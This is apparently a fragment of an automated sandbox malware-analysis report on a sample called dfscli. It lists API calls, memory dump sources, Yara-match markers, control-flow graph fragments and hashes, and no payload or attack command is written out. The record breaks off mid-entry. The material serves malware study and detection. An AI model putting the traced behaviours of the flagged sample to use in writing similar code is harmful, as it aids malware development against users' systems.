                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004298A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                  • String ID:
                                                                  • API String ID: 2667261700-0
                                                                  • Opcode ID: 4f9e3a5ef5ad01d73bbac885e9157687d52a2eef6912d29c00d5968687f22220
                                                                  • Instruction ID: c16d36367e021ba24902c865a556433996ae8c1a0eb80cc3bd54c7b43d994e5f
                                                                  • Opcode Fuzzy Hash: 4f9e3a5ef5ad01d73bbac885e9157687d52a2eef6912d29c00d5968687f22220
                                                                  • Instruction Fuzzy Hash: 43319A30700714AFDB20DF66D888A6ABBF9FB84344B44497EE546D3620D734ED06CB68

                                                                  Control-flow Graph

                                                                  control_flow_graph 449 42a134-42a17d call 4295d4 GetModuleFileNameA 452 42a183 call 425d8a 449->452 453 42a17f-42a181 449->453 454 42a188-42a19a PathFindExtensionA 452->454 453->452 453->454 456 42a1a1-42a1bd call 42a105 454->456 457 42a19c call 425d8a 454->457 461 42a1c4-42a1c9 456->461 462 42a1bf call 425d8a 456->462 457->456 464 42a1db-42a1de 461->464 465 42a1cb-42a1d8 call 40f132 461->465 462->461 467 42a1e0-42a1ee call 42453c 464->467 468 42a209-42a212 464->468 465->464 477 42a1f3-42a1f5 467->477 469 42a214-42a218 468->469 470 42a245-42a248 468->470 473 42a221 469->473 474 42a21a-42a21f 469->474 475 42a24a-42a269 lstrcatA call 40f132 470->475 476 42a26c-42a281 call 40ea18 470->476 478 42a226-42a242 lstrcpyA call 40f132 473->478 474->478 475->476 480 42a1f7-42a1fb 477->480 481 42a1fd 477->481 478->470 485 42a200-42a206 call 40f132 480->485 481->485 485->468
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 0042A175
                                                                  • PathFindExtensionA.KERNELBASE(?), ref: 0042A18F
                                                                  • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042A229
                                                                  • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042A256
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ExtensionFileFindModuleNamePathlstrcatlstrcpy
                                                                  • String ID: .CHM$.HLP$.INI
                                                                  • API String ID: 2140653559-4017452060
                                                                  • Opcode ID: 1f62230ddda9a0eead22fd259ae79f4ed6fab4bf6a31e99d3694113894dfedf5
                                                                  • Instruction ID: bd75d3f52a36107bd73cc6bad142ef63f8b4208a48895ac81a5cbf6014c068f0
                                                                  • Opcode Fuzzy Hash: 1f62230ddda9a0eead22fd259ae79f4ed6fab4bf6a31e99d3694113894dfedf5
                                                                  • Instruction Fuzzy Hash: 19418C71600758DFCB30EFAAEC44ADA77E8EB08314F50482BE986D6241DB389955CF29

                                                                  Control-flow Graph

                                                                  control_flow_graph 490 42a282-42a2ae SetErrorMode * 2 call 4295d4 * 2 495 42a2b0-42a2c3 call 42a134 490->495 496 42a2c8-42a2d2 call 4295d4 490->496 495->496 500 42a2d4 call 41f835 496->500 501 42a2d9-42a2e6 496->501 500->501 504 42a2e8-42a2f4 GetProcAddress 501->504 505 42a2f9-42a2fc 501->505 504->505
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00000000,00000000,00425BE7,?,?,?,?,76230A60,00000000,?,0040E996,00000000), ref: 0042A28B
                                                                  • SetErrorMode.KERNELBASE(00000000,?,0040E996,00000000), ref: 0042A293
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,0040E996,00000000), ref: 0042A2DE
                                                                  • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0042A2EE
                                                                    • Part of subcall function 0042A134: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 0042A175
                                                                    • Part of subcall function 0042A134: PathFindExtensionA.KERNELBASE(?), ref: 0042A18F
                                                                    • Part of subcall function 0042A134: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042A229
                                                                    • Part of subcall function 0042A134: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042A256
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                                                  • String ID: NotifyWinEvent$`#vp,$v$user32.dll
                                                                  • API String ID: 4004864024-19817718
                                                                  • Opcode ID: 458393a66d8bd0e2f0924bc2239fc2bb7060a4c2f2eaa8a22abf50ff16afb230
                                                                  • Instruction ID: 1aae1a9dc3cd045b93222ce5a26779434126d71d87e6cd8d5dbcd172a642732a
                                                                  • Opcode Fuzzy Hash: 458393a66d8bd0e2f0924bc2239fc2bb7060a4c2f2eaa8a22abf50ff16afb230
                                                                  • Instruction Fuzzy Hash: 9701A2717002219FD724EF21A809A593BA8AF04300F4984AFF445D73A2DB38C880CF7A

                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 004254CF
                                                                  • GetSystemMetrics.USER32(0000000C), ref: 004254D6
                                                                  • GetSystemMetrics.USER32(00000002), ref: 004254DD
                                                                  • GetSystemMetrics.USER32(00000003), ref: 004254E7
                                                                  • GetDC.USER32(00000000), ref: 004254F1
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00425502
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042550A
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00425512
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                  • String ID:
                                                                  • API String ID: 1031845853-0
                                                                  • Opcode ID: b06320392e429a04cf71825453b5b9399e0fdba567c3017782f8956d99a1d2f7
                                                                  • Instruction ID: 6a1c861a32fe4ac7800512cecdb92344e909a3b8a9975da52ba67c4561c5568e
                                                                  • Opcode Fuzzy Hash: b06320392e429a04cf71825453b5b9399e0fdba567c3017782f8956d99a1d2f7
                                                                  • Instruction Fuzzy Hash: A6F01D71A40704AEE720AF729C89F277BA4EB81B51F11493AF6418B2D0D6B598068F54

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 02233182
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID: &$B$S=
                                                                  • API String ID: 1279760036-3580750612
                                                                  • Opcode ID: 4b521b2d453ed485b4964c7d019078c9f0a1195a4c8206564795ce192a574a16
                                                                  • Instruction ID: 5fff627adcab5e9511c5d1e4d88bb91a0091beae034f6ef72a7779811a535692
                                                                  • Opcode Fuzzy Hash: 4b521b2d453ed485b4964c7d019078c9f0a1195a4c8206564795ce192a574a16
                                                                  • Instruction Fuzzy Hash: C451C7B1A243029BC719DEA8949852BB7E6FFD4744F104C5EF086CB258DB70DB498BD2

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 02234C21
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID: D$.#v$Ei
                                                                  • API String ID: 963392458-2687700827
                                                                  • Opcode ID: 536524d73150d234903e90576eaa7d9ed7a31ee2524f383329b7311f45224f6f
                                                                  • Instruction ID: db920037a7285f548e874873df86f1e5edc840882bf3a41fddc10e1a7f6bba8a
                                                                  • Opcode Fuzzy Hash: 536524d73150d234903e90576eaa7d9ed7a31ee2524f383329b7311f45224f6f
                                                                  • Instruction Fuzzy Hash: 6821B1B5B203026BE716EBF8AC54B6A37E2AFC0640F404C69F545CB284EFB4D9158BD1

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • RegOpenKeyExA.KERNELBASE(80000001,0043B2A4,00000000,00000001,?), ref: 00428215
                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 00428235
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00428279
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0042828F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Close$OpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 1607946009-0
                                                                  • Opcode ID: 65fa2c3f979de50099cc2811b2363345d5be31521dc93f030b08f37819c87299
                                                                  • Instruction ID: fa71898e03329bcf94aa1d3a20f1a241a73731d4e52d53b435c0548dfa0eec47
                                                                  • Opcode Fuzzy Hash: 65fa2c3f979de50099cc2811b2363345d5be31521dc93f030b08f37819c87299
                                                                  • Instruction Fuzzy Hash: 9E216AB1E01228EFDF15CF96D848AAEBBF8FF94314F5040AEE405A6211DB745A01CF29

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,02190005), ref: 021900E9
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,02190005), ref: 02190111
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2190000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocInfoNativeSystemVirtual
                                                                  • String ID:
                                                                  • API String ID: 2032221330-0
                                                                  • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                  • Instruction ID: 9b64a07251f5f2f26724ec7cbc941aeac0d7e949ac953b3b7d3ff38de1105709
                                                                  • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                  • Instruction Fuzzy Hash: D7D1DF71A883068FDF24CF69C88076AB7E1FF88318F18852DE895DB241E774E955CB91

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID: Ei
                                                                  • API String ID: 4033686569-3988083245
                                                                  • Opcode ID: 1a4eab572f3a903765ff23fe26fc2c1c4aad65efcaaf226eb19d3f89378d6d87
                                                                  • Instruction ID: e363d03a30651d21ca349afa6a17c5988db6a07cb8dc1d62208121304cbc8ded
                                                                  • Opcode Fuzzy Hash: 1a4eab572f3a903765ff23fe26fc2c1c4aad65efcaaf226eb19d3f89378d6d87
                                                                  • Instruction Fuzzy Hash: CD11BFB5F203016BD715F7F4A894A6B36E7AFC0644B04086CE456CB248EE78CA118BE1
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 0040DDDF
                                                                    • Part of subcall function 004108E8: EnterCriticalSection.KERNEL32(?,?,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00410910
                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00431A20,0000000C,0040DE48,000000E0,0040DE73,?,0041086B,00000018,00431B30,00000008,00410901,?,?), ref: 0040DE20
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateCriticalEnterHeapSection__lock
                                                                  • String ID:
                                                                  • API String ID: 409319249-0
                                                                  • Opcode ID: 0be4bc3f3b2008a58ca10510bab6c21abc707aaf6d34d0de6824ed3c22b2e4db
                                                                  • Instruction ID: cb3ef9c9b0d75a7fffe9d60d5eea93ecefce8f5efa7861fcc474e081dc08dee6
                                                                  • Opcode Fuzzy Hash: 0be4bc3f3b2008a58ca10510bab6c21abc707aaf6d34d0de6824ed3c22b2e4db
                                                                  • Instruction Fuzzy Hash: 30F0C231D41A14A7DB20BFA1EC0675E7B30AB25728F20023BE9143A2E1C73C299986CC
                                                                  APIs
                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040E8E0,00000001,?,00431A70,00000060), ref: 00410944
                                                                    • Part of subcall function 00410984: HeapAlloc.KERNEL32(00000000,00000140,0041096C,000003F8,?,00431A70,00000060), ref: 00410991
                                                                  • HeapDestroy.KERNEL32(?,00431A70,00000060), ref: 00410977
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCreateDestroy
                                                                  • String ID:
                                                                  • API String ID: 2236781399-0
                                                                  • Opcode ID: 0c262e1b3af968b4c6dfc27b1994cb5ebb7051e99d81131d6ad7a3e46444b815
                                                                  • Instruction ID: 644ccde18484a5878455bc069f2a0ce95f43452f64f7cc8ffed50bff23627854
                                                                  • Opcode Fuzzy Hash: 0c262e1b3af968b4c6dfc27b1994cb5ebb7051e99d81131d6ad7a3e46444b815
                                                                  • Instruction Fuzzy Hash: E7E09AF1BB03089AFB206B716C1876676A4EB44346F10483BF240C82A2EFB8D5C19A0C
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0041F848
                                                                  • SetWindowsHookExA.USER32(000000FF,0041F6B7,00000000,00000000), ref: 0041F858
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentHookThreadWindows
                                                                  • String ID:
                                                                  • API String ID: 1904029216-0
                                                                  • Opcode ID: 701a3d6a2974d6ff03211ac8c2448b0ce0685527336f7c5a3be3efa98d3f99a2
                                                                  • Instruction ID: 92535d9c526e6fa1784d7b0884afd0ec4ee71ce80cfdde11631e7970a4356ca2
                                                                  • Opcode Fuzzy Hash: 701a3d6a2974d6ff03211ac8c2448b0ce0685527336f7c5a3be3efa98d3f99a2
                                                                  • Instruction Fuzzy Hash: 32D05E72B042606EDB217B72BC09B553A845B00320F9806AAF411911D2C7288C834B6E
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000), ref: 02235CCB
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: c18f626bd62c2e601dedae607d7f27ce85d5ff8326e1735b070e030a7c522120
                                                                  • Instruction ID: a7008425a57ec5e33412e394bdf2e75d99925af604c04b986ca7cbd526e88a97
                                                                  • Opcode Fuzzy Hash: c18f626bd62c2e601dedae607d7f27ce85d5ff8326e1735b070e030a7c522120
                                                                  • Instruction Fuzzy Hash: F1D0C9A6B61301A6E601AAF0785472A25AB5FA0645F404819F549DA29CEE7489214AD1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: e2d040b58d2e732b0d0dcea39a807528dcdbe6e0a658436ef4808abc9a245d1d
                                                                  • Instruction ID: 86b6000765a73317fef6ebdd1d3f7835681af8542c8e3a940374cd9bb61a5516
                                                                  • Instruction Fuzzy Hash: 145173319402049FCB14DBA9CCC09EEB7F9EF49324F24452BE512E76D0D778A985CBA9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117474523.00000000021C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_21c1000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 22393a0a231f58714c2abf88766f729b7b744dc00a807db8671df6b4b1cf26ba
                                                                  • Instruction ID: 49daa0df4f8a965b6ccf561f30a6983fd8226c824fa50cf98b9a78ade69b819d
                                                                  • Instruction Fuzzy Hash: DB41CA78A84109EFDB04CF44C494BAAB7B2FB98314F24C599E8199F355C775EA92CB80
                                                                  APIs
                                                                  • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,022368DC), ref: 022370F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: c604fecd2f357d0cd35e3c68154e47d7c3af0cb7dab060c071d8e2c53ccdbbba
                                                                  • Instruction ID: 9b2ced41c999442ca5a45b78ee36d5abc03ac4ebb41b76e00b316bc642c36f38
                                                                  • Instruction Fuzzy Hash: DD31A1E5B3420267DE27AAF9649433B515F9B84244F64086AF043CF35CDEB9CD128BD6
                                                                  APIs
                                                                  • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,0223704F,022368DC), ref: 02236F40
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: c3d711c0ca32f0422ebe1e4e81bf2c4620ba86f4f24b7bd6bbb35e06b957768c
                                                                  • Instruction ID: 32c49b9775d694e3b7a3f54abddbe24539b001b80e5412cb69339c7507e8b41b
                                                                  • Instruction Fuzzy Hash: FE0178B5B21301ABD715FBF4B89472A26EBAFC06947040CA8F006CB348EE38DD018BD0
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00429CAB
                                                                    • Part of subcall function 004299F1: TlsAlloc.KERNEL32(?,00429CD5,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60,00000000,?,0040E996,00000000), ref: 00429A13
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AllocH_prolog
                                                                  • String ID:
                                                                  • API String ID: 3910492588-0
                                                                  • Opcode ID: 391db097ecbc7f2e887088de165df358eb552572bb53b512a5a088e6feeae371
                                                                  • Instruction ID: e3d1adaf2064881ac0a353d79633cd097c0c2aad4d25d7745887e64319261521
